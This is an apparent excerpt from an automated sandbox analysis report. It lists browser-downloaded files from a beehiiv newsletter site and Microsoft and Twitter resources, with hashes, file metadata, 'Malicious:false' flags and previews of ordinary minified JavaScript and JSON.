                                                                                                                                            SHA1:0F539B3458D70B7C2D695A470179D0D11B5B97D7
                                                                                                                                            SHA-256:7EB286C13D9BC4A44C58081668BE6B300B2382B1A19E625BBB4D194B4FF48C6E
                                                                                                                                            SHA-512:C188D8D0D8B10EC614E47303BD7E8D26B56C59AB2E598FA135089D94FA4F52F20DFE357FC8BDCB6D77A4543A5594BFEE1B264CBFC15C093710E5AB81E2037BA1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwndx8I0SzaWTRIFDX4zYFMSBQ09I3whEgUNAud5ZBIFDXe3dZoSBQ1QqCqxEgUNg6hbPQ==?alt=proto
                                                                                                                                            Preview:CjYKBw1+M2BTGgAKBw09I3whGgAKBw0C53lkGgAKBw13t3WaGgAKBw1QqCqxGgAKBw2DqFs9GgA=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1900)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2258
                                                                                                                                            Entropy (8bit):5.245387212575917
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEfxFN4k/wtdYRAd3d/5q5fUnRNpE787g9Dx39aodue94wqXI:QirP53BAS7+x3co99q4
                                                                                                                                            MD5:E0A9A569F2C27BC249D9061A47F86F53
                                                                                                                                            SHA1:C6BFB3D5781D6904A003A7BE9D90EAE28569039D
                                                                                                                                            SHA-256:6A522907FF0D0700FD1AF0A634FF3AA83983F5AC9552953B1E7FCD62733386A5
                                                                                                                                            SHA-512:A90275A00125DABB138CBC89753BFE5217A3DE55E02C339E02E3E795A66E4A7AEC7DD9AD81FCDEBCEEADA15EF18DF7B54FD3EC7B9773965A18EE2F79D263A593
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-EzvqLY92.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0d2d54d6-3fc9-5f6a-805d-6c801f76c592")}catch(e){}}();.import{j as n}from"./jsx-runtime-BjG_zV1W.js";import{c as y}from"./index-x2da_zcv.js";import{L as u}from"./components-Oj2xMfGE.js";const f="border font-medium shadow-sm wt-button-font inline-flex items-center disabled:bg-gray-400 disabled:cursor-not-allowed focus:outline-none focus:ring-2 focus:ring-offset-2 justify-center transition-colors",m="border-wt-primary text-wt-text-on-primary bg-wt-primary disabled:border-gray-500 focus:ring-wt-primary",l="bg-white hover:bg-gray-100 text-gray-800 border-gray-200 disabled:bg-gray-200 disabled:text-gray-300 focus:ring-wt-secondary",w="border-gray-300 text-gray-700 bg-white shadow-md focus:ring-wt-primary",p="border-red-600 text-white bg-red-600 shadow-md hover:border-red-700 hover:bg-r
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):16378
                                                                                                                                            Entropy (8bit):7.986541062710992
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                                                            MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                                                            SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                                                            SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                                                            SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                                                                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):72
                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):366
                                                                                                                                            Entropy (8bit):5.506207913256503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYgxSkFdX4LNNw1QzwsbJEPSGkFd/:UgDGH4LOaOvCaBfuSmfdX4LNwuwsli0h
                                                                                                                                            MD5:27F2AACFD574ADA9FA448994216020DC
                                                                                                                                            SHA1:3180CC664DCFB01B8D89B7F6C7126D58AD9F358D
                                                                                                                                            SHA-256:7127943C9B6B80DD51DE90D6D6999F0AE6BE24FB3474A7293AF1062D7B177585
                                                                                                                                            SHA-512:3295CEDCB9966075F38224F7B55C4AC02D54B7A24CCD85ACE32989EC61263936A06EF6ACD606E12F49248D45A1B39C8C4D466CA4DD40EAD2A3D2BF5A99F678B6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/post_insights-l0sNRNKZ.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e9e78a96-785e-5676-ae3e-00bd82c51597")}catch(e){}}();..//# sourceMappingURL=post_insights-l0sNRNKZ.js.map..//# debugId=e9e78a96-785e-5676-ae3e-00bd82c51597.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):366
                                                                                                                                            Entropy (8bit):5.506207913256503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYgxSkFdX4LNNw1QzwsbJEPSGkFd/:UgDGH4LOaOvCaBfuSmfdX4LNwuwsli0h
                                                                                                                                            MD5:27F2AACFD574ADA9FA448994216020DC
                                                                                                                                            SHA1:3180CC664DCFB01B8D89B7F6C7126D58AD9F358D
                                                                                                                                            SHA-256:7127943C9B6B80DD51DE90D6D6999F0AE6BE24FB3474A7293AF1062D7B177585
                                                                                                                                            SHA-512:3295CEDCB9966075F38224F7B55C4AC02D54B7A24CCD85ACE32989EC61263936A06EF6ACD606E12F49248D45A1B39C8C4D466CA4DD40EAD2A3D2BF5A99F678B6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e9e78a96-785e-5676-ae3e-00bd82c51597")}catch(e){}}();..//# sourceMappingURL=post_insights-l0sNRNKZ.js.map..//# debugId=e9e78a96-785e-5676-ae3e-00bd82c51597.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (7140)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):7502
                                                                                                                                            Entropy (8bit):5.4412144110616065
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:5zl50I3BZKkp/nRhblk7ljSmp5nzZVMWMOBI:5zl53RZKkp/Rhb+hjSmfzZiF+I
                                                                                                                                            MD5:CD14DDF127E2DD94222ECEE7ABE3B934
                                                                                                                                            SHA1:2D020DEBFF0433495966E6914CCF9FDC70EB0764
                                                                                                                                            SHA-256:6CDCC1F6C25CA1D266780C7B66B60C9B9EE84D131294F85D1A7C8881822B25B6
                                                                                                                                            SHA-512:2B25E4D866D2C86C041F0D59F9E071EDA49262997EDC95544A5F8E6038AACE27570819B2B1AC5B412856CBAEE8A5A2468D318944D74F9DA3FE3A38FB27C62B37
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/dayjs.min-B8CfgAhU.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="77599b8c-fb16-5d46-85f2-88519cabf801")}catch(e){}}();.import{c as R,g as K}from"./index-D6da9p6-.js";var N={exports:{}},E;function X(){return E||(E=1,function(V,et){(function(W,x){V.exports=x()})(R,function(){var W=1e3,x=6e4,U=36e5,A="millisecond",S="second",w="minute",O="hour",M="day",H="week",m="month",J="quarter",y="year",_="date",Z="Invalid Date",B=/^(\d{4})[-/]?(\d{1,2})?[-/]?(\d{0,2})[Tt\s]*(\d{1,2})?:?(\d{1,2})?:?(\d{1,2})?[.:]?(\d+)?$/,G=/\[([^\]]+)]|Y{1,4}|M{1,4}|D{1,2}|d{1,4}|H{1,2}|h{1,2}|a|A|m{1,2}|s{1,2}|Z{1,2}|SSS/g,P={name:"en",weekdays:"Sunday_Monday_Tuesday_Wednesday_Thursday_Friday_Saturday".split("_"),months:"January_February_March_April_May_June_July_August_September_October_November_December".split("_"),ordinal:function(s){var n=["th","st","nd","rd"],t=s%100;
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (14684)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15043
                                                                                                                                            Entropy (8bit):5.32237250424253
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EkkEwXPRj4MLS/7Bru/oM471eVpxFaaYLvCn:EYw/uMu/liBKe+fLvCn
                                                                                                                                            MD5:AC77F9D6B72C13BF61247B4A257CAEC1
                                                                                                                                            SHA1:BD3E776BF62B2118116034E5167112A9E33408AE
                                                                                                                                            SHA-256:D1793A4AA1663F429A67313830A6D15FC2FF5A73EDC4968BF416CEA6E3715CFC
                                                                                                                                            SHA-512:142837960A488EF62D2992F402BA7E1299EAC1CB7EE3FE855D4F24229AE9BD3DF8BB9B9729C65E67A97B5B41585410F093AB372E0057E70131288CA6186F258C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d48d6232-3d16-5628-acfe-6d6e3038fb83")}catch(e){}}();.import{r as s,e as f,R as J}from"./index-D6da9p6-.js";import{p as Be,r as xe}from"./bugs-DVQzBh-s.js";import{o as b,U as P,y as C,f as fe,u as A,C as O,t as pe,b as me,l as ee,O as ue,I as H,a as Ie}from"./keyboard-CaEu2o0u.js";import{n as Ne,s as _,c as We,E as ge,e as Ye,N as Ue,l as K,t as Q}from"./use-root-containers-DmyWFwuo.js";import{O as V,M as R,a as ve,y as D,N as _e}from"./use-is-mounted-BaHv16bB.js";import{n as he,t as je,u as Ve,d as j,y as qe}from"./transition-y-5XFFuu.js";import{f as se,s as ce}from"./hidden-KuoXmiN5.js";import{G as Ge,w as ze}from"./description-BklOXbF-.js";function te(e,t){let n=s.useRef([]),r=b(e);s.useEffect(()=>{let o=[...n.current];for(let[l,i]of t.entries())if(n.current[l]!==i){let a=r(t,
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (8954)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9331
                                                                                                                                            Entropy (8bit):5.413016811582397
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:OJftH7dkI/KxO27f4sWziTK/OHOhqOwNMD7nM1sWzfwY4o:wtHhR/IzjTK2HOhtwNMD7nMnwY4o
                                                                                                                                            MD5:F181F6A00E8129C57154F579F3E5BC7E
                                                                                                                                            SHA1:F131D63A42EDA0ABF5B3826503AAF927A7AE9867
                                                                                                                                            SHA-256:90ED6822E113996411DFD42BA2DD0178DCD46BE1C84EC1E1EDE1C563B5A1C4D4
                                                                                                                                            SHA-512:B4BF9DB3D244B474D59D8B2E78AAD88FB909C7CC09F11146C9D4490DD4E0200D61BD960E9DC13A642C85FEF50B1B8A2E9C2BAC0AA204D8C187573D833E04F58F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/useSetLastViewedResource-BelRoKi6.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5728b016-604d-5b0b-93aa-534141abd4fa")}catch(e){}}();.import{r as d,a as N,u as k}from"./index-D6da9p6-.js";import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{_ as F}from"./index-CqJN8iQq.js";import{u as $}from"./useIsLoggedIn-BbU3-q43.js";import{u as S}from"./useToast-DK42uF07.js";import{c as L,L as w,u as j}from"./components-Oj2xMfGE.js";import{u as b}from"./useTranslation-CfKJAmGY.js";import{L as T}from"./LoginWithPasswordAction-TVLpJaLq.js";import{T as f}from"./index-BdpAPpdN.js";import{I as M}from"./Image-ycA_AFLr.js";import{_ as g}from"./dialog-CtpHvvfD.js";import{F as v}from"./XMarkIcon-BIfmjQfr.js";import{q as x}from"./transition-y-5XFFuu.js";const P=s=>/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(s),z=({allowSignup:s=!0,onSuccess:r})=>{const[a,t]=d.useState(""),n=$(),o=L(),m=o.da
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):870
                                                                                                                                            Entropy (8bit):4.557768118179261
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:YEFz7kZPZ+sDZbfIup6GvDF7DZmZ+51DZd/nm7UZX:YEdkVgMNwsMyVr/mIp
                                                                                                                                            MD5:AD809A6B9AFDA5DDE3EFF67031431B4B
                                                                                                                                            SHA1:060E8CBE024196552636C951D6CDF83AEE97F55B
                                                                                                                                            SHA-256:8EC44A4B321F5115D8760F193298585D8B28A26DD3190D0A3690B9E09A489A94
                                                                                                                                            SHA-512:D36BDEF3595ECF8BD520C5292C2F14390D768958A26D8A2D5252D27C18EA1F3A7FCE522FE250027C98A2F0A56DC853A48396309F9A2816404CFE95DF9BAFBB0F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:{"should_obtain_cookie_consent":false,"features":{"tfw_timeline_list":{"bucket":[],"version":null},"tfw_follower_count_sunset":{"bucket":true,"version":null},"tfw_tweet_edit_backend":{"bucket":"on","version":null},"tfw_refsrc_session":{"bucket":"on","version":null},"tfw_fosnr_soft_interventions_enabled":{"bucket":"on","version":null},"tfw_mixed_media_15897":{"bucket":"treatment","version":null},"tfw_experiments_cookie_expiration":{"bucket":1209600,"version":null},"tfw_show_birdwatch_pivots_enabled":{"bucket":"on","version":null},"tfw_duplicate_scribes_to_settings":{"bucket":"on","version":null},"tfw_use_profile_image_shape_enabled":{"bucket":"on","version":null},"tfw_video_hls_dynamic_manifests_15082":{"bucket":"true_bitrate","version":null},"tfw_legacy_timeline_sunset":{"bucket":true,"version":null},"tfw_tweet_edit_frontend":{"bucket":"on","version":null}}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):364
                                                                                                                                            Entropy (8bit):5.492500134735472
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYpURc4NNw1QWtJEPfacpn:UgDGH4LOaOvCaBfuShURjNwjifam
                                                                                                                                            MD5:222F131061CB0EAA746C7FBD54BFDC1D
                                                                                                                                            SHA1:5D8BD1353A1FB951D94BC31B462F36FAF89FA91D
                                                                                                                                            SHA-256:834BB85855936BFF620857F8901ED2E82805F2CEEC001ADE8234570013509D6D
                                                                                                                                            SHA-512:2F9ECF97443EEA89FE25938B6B37C79C66346BF6331C088FCA164092EABA37D6380AE9D4F0761E316C6127B3BC5E900E64BE674541DC6A6C7AFCADF0E66AB08E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/visit_token-l0sNRNKZ.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dea111b5-62d1-501e-9de6-137635cc7767")}catch(e){}}();..//# sourceMappingURL=visit_token-l0sNRNKZ.js.map..//# debugId=dea111b5-62d1-501e-9de6-137635cc7767.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1857)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2215
                                                                                                                                            Entropy (8bit):5.463704007023226
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkER5NHoJ4o0r4v34BZezeY5Ixbm9CbHXLDc:Q5zznra7zeOWbHXLDc
                                                                                                                                            MD5:CD6BE897601E289DC49D164555871748
                                                                                                                                            SHA1:B3B1B2C58529AAD481BD680A24A35DD95517349B
                                                                                                                                            SHA-256:7E164144421C07E16F09F1BBA3BB9D21C483B9AC1E7F647DB3B9C70D5FEBBD1F
                                                                                                                                            SHA-512:5F1F5F1B5DABBBCDE385A6CFC2556D00DC4A5AC95CA50BCA158979385E7678CB7CA66D2E7E2806151A12EA4B07E32D228F0979FC3151445C93F687BA80306D26
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="009071c1-ee74-5ac3-8335-b6fb9e437637")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as m}from"./index-x2da_zcv.js";import{u,a as g,r as j}from"./index-D6da9p6-.js";import{u as N}from"./useTranslation-CfKJAmGY.js";import{u as y,L as b}from"./components-Oj2xMfGE.js";const k=({isFullWidth:l=!1,inline:n=!1,errorCode:t="404",publicationPresent:o=!0,customTitle:f,customDescription:h,error:e})=>{const{t:a,i18n:c}=N(),p=c.exists(`errors.${t}.title`)?a(`errors.${t}.title`):a("errors.fallback.title"),d=c.exists(`errors.${t}.description`)?a(`errors.${t}.description`):a("errors.fallback.description"),r=u(),{pathname:x}=g(),[i]=y();return j.useEffect(()=>{t==="404"&&!i.has("404")&&r(`/?${new URLSearchParams({404:x})}`)},[t,x,i,r]),s.jsx("div",{className:m("mx-auto fle
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (789)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1147
                                                                                                                                            Entropy (8bit):5.445598437701319
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSbcLNCan0ZXa8Dq7SsveezXhS9OhGYGzAH3yBWuT:JWkEfiN1GXacXyXzXlQE4WuT
                                                                                                                                            MD5:BC1AC338B71953A031C84D1D1181E652
                                                                                                                                            SHA1:B67BAAF5BD53E6DDAC477CD2BD1B5960CDABBE58
                                                                                                                                            SHA-256:C752B9FB223A1DB46F685D50D276ADE13902F46F6EE998505EBDA0EBF87A2C46
                                                                                                                                            SHA-512:21A955CAF16D723F97432B4DE013BC553E2A320D33DD3A6B4D003C9DB88C0A798CE9BC5711B392FCD9AF45C0EF62AD1156A481E3F33F61088EDA388369D9C0A4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-CCu-G_ty.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e4d6ec24-cba6-50d3-86bc-43cf8d83bb7f")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{e as a}from"./index-D6da9p6-.js";import{F as c}from"./ChevronRightIcon-Dsmk2epM.js";const l=({breadcrumbs:s,homePage:n})=>{const o=n?.general_section.theme.text_color||"";return e.jsx("ul",{className:"flex flex-wrap items-center gap-2 text-xs font-semibold",children:s.map((t,r)=>e.jsx(a.Fragment,{children:e.jsxs("li",{suppressHydrationWarning:!0,className:"flex items-center gap-2 text-wt-text-on-background",style:{color:o},children:[r===s.length-1?e.jsx("span",{className:"!opacity-100",children:t.text}):e.jsx(a.Fragment,{children:t.href?e.jsx("a",{href:t.href,className:"opacity-70",children:t.text}):e.jsx("span",{className:"opacity-70",children:t?.text})}),r!==s.length-1&&e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (10369)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):10731
                                                                                                                                            Entropy (8bit):5.390992725177293
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:J4aO2F5ohy+hk81B1h151rbXYBzaxU6ctyqmyFY1Ob8:J46+hksLrD4BzAjyFB8
                                                                                                                                            MD5:C02F648F177E518C48A22DB5298A1A2D
                                                                                                                                            SHA1:96FE17BDAB414CF8AF06CB7A0D8D118F8361BD3D
                                                                                                                                            SHA-256:0853BE823EDCC27DF0573B5ED5B4561A6EC0E5061841ADF47F82EC3099FE98EB
                                                                                                                                            SHA-512:0557607E2A4628C7091CEB8705A51D54DA04B1A6CD48F52B01AF693D3B3D700BC206984FE4FD2742775BB10357203077B78D23F68D890495ED9416579116E9CA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/XMarkIcon-BIfmjQfr.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cf862631-32ee-5fef-9f35-5adf32293ff4")}catch(e){}}();.import{r as c,e as N}from"./index-D6da9p6-.js";import{p as q,r as H}from"./bugs-DVQzBh-s.js";import{o as v,O as U,U as P,y as w,u as V,C as E,I as L,a as f,T as X,b as A,l as $}from"./keyboard-CaEu2o0u.js";import{y as J,s as W,d as F,n as Y,u as Z}from"./transition-y-5XFFuu.js";import{F as z}from"./use-tree-walker-Inv4mdsP.js";import{h as ee,T as te,_ as re,M as Q,D as G,I as ne}from"./use-is-mounted-BaHv16bB.js";function B(e){return[e.screenX,e.screenY]}function ae(){let e=c.useRef([-1,-1]);return{wasMoved(a){let r=B(a);return e.current[0]===r[0]&&e.current[1]===r[1]?!1:(e.current=r,!0)},update(a){e.current=B(a)}}}function ue(e){throw new Error("Unexpected object: "+e)}var g=(e=>(e[e.First=0]="First",e[e.Previous=1]="Previous
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):446
                                                                                                                                            Entropy (8bit):5.548128582277272
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:W5V/pADGH4LvGaDzGvdAZE2MEuuo7wW6wewSYFb578uNNw1bv+godOdCWWCC6VK/:UgDGH4LOaOvCaBfuSLBNwz+Zd1WvVjhU
                                                                                                                                            MD5:431D51F526ED5C0B596A380370707958
                                                                                                                                            SHA1:7989BE9BB37FA40EB389B6022D953FC30DD54E51
                                                                                                                                            SHA-256:48F02BCD00E4D46A6CC9DD0FFDB224309977F2032A9BE31968BDA707D2506393
                                                                                                                                            SHA-512:08F4466149215601BA5BC17DCF0BD5D01E67AA22C7EBCF5E8922FFC283B1AD2245CD12C5B951E8CD6FC1A3DCDB9288CA44F29C333E8FCE5C7F7D84298C4D684C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="73d08a9f-a008-5d16-8511-087e016ced4b")}catch(e){}}();.import{a}from"./components-Oj2xMfGE.js";const e=()=>a(),r=e;export{r as u};.//# sourceMappingURL=useTypedLoaderData-Bk1_tu68.js.map..//# debugId=73d08a9f-a008-5d16-8511-087e016ced4b.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3027)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3385
                                                                                                                                            Entropy (8bit):5.373762987112694
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEVN1SnXxitgZdbedxxSvlg3K0wRObiY6uaNXFKdCSA/dHtUd7570waRp1a6zx:QdSkgZ5e9Sd5ROOcaNXSo/dH81Sk0
                                                                                                                                            MD5:D9FC76228771CED44350EE8223CF8A78
                                                                                                                                            SHA1:E922D9199ACC2339C7B8C3F6ABA527B6209C3FB2
                                                                                                                                            SHA-256:1D91233A394023BEFBEE7FCDA06592FCA2E2F70EE929802F0BE76EB0435F6821
                                                                                                                                            SHA-512:43D999CF3E4F0E8D9893D14DC789F38367B5B3D97217F98908A81FC15654EDC1C4A3530F6F55B15488702B593C4C97AD92BE6E9E6D0F7C4D764331C8EDF88922
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
